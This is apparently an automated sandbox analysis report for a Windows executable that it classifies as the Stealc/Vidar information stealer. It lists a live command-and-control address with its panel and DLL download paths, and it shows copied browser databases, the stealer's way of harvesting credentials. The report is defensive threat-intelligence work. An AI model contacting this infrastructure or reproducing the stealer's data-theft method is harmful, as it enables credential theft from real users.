C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
http://185.215.113.37/	100%	URL Reputation	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://185.215.113.37	100%	URL Reputation	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://185.215.113.37/e2b1563c6670f193.php	100%	URL Reputation	malware
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true		unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	HCAKFBGC.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	HIDAKFIJJKJJJKEBKJEHCBGDAK.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	HCAKFBGC.0.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000002.1979573658.0000000001334000.00000004.00000020.00020000.00000000.sdmp, AECAKECAEGDHIECBGHII.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d	file.exe, 00000000.00000002.2002927025.00000000296E5000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	HCAKFBGC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1979573658.000000000125E000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dllKH	file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000003.1850248317.000000001D630000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dllyH	file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dllwH	file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	AECAKECAEGDHIECBGHII.0.dr	false		unknown
http://185.215.113.37e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmp	true		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	HCAKFBGC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpser	file.exe, 00000000.00000002.1979573658.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpf	file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpdll	file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000002.1979573658.0000000001334000.00000004.00000020.00020000.00000000.sdmp, AECAKECAEGDHIECBGHII.0.dr	false		unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2006812075.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1996927028.000000001D72B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37o	file.exe, 00000000.00000002.1979573658.000000000125E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, 00000000.00000002.2007449138.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpeF1	file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	file.exe, 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	file.exe, 00000000.00000002.1979573658.0000000001334000.00000004.00000020.00020000.00000000.sdmp, AECAKECAEGDHIECBGHII.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	HCAKFBGC.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpV	file.exe, 00000000.00000002.1979573658.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpZ	file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	file.exe, 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	HCAKFBGC.0.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.1979573658.0000000001334000.00000004.00000020.00020000.00000000.sdmp, AECAKECAEGDHIECBGHII.0.dr	false		unknown
http://185.215.1	file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpB	file.exe, 00000000.00000002.1979573658.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, file.exe, 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1850248317.000000001D630000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpnF	file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t	file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://www.ecosia.org/newtab/	HCAKFBGC.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	HIDAKFIJJKJJJKEBKJEHCBGDAK.0.dr	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	HCAKFBGC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php0	file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1979573658.0000000001334000.00000004.00000020.00020000.00000000.sdmp, AECAKECAEGDHIECBGHII.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phppFL	file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php3	file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dlleH	file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpFirefox	file.exe, 00000000.00000002.1979573658.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll3IZ	file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.mozilla.org	HIDAKFIJJKJJJKEBKJEHCBGDAK.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	HCAKFBGC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php(	file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1525134
Start date and time:	2024-10-03 18:37:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/22@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 75 Number of non-executed functions: 49
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	Setup.exe	Get hash	malicious	RedLine	Browse	185.215.113.22
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AAFIDGCFHIEHJJJJECAK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AECAKECAEGDHIECBGHII

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\HCAKFBGC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCAKFBGCBFHIJKECGIIJKJKJKJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDAFIIDA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIDAKFIJJKJJJKEBKJEHCBGDAK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJKFBAKFBGDHIEBGDAKFCAFHCB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFBAAFCGIEGDHIEBFII

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
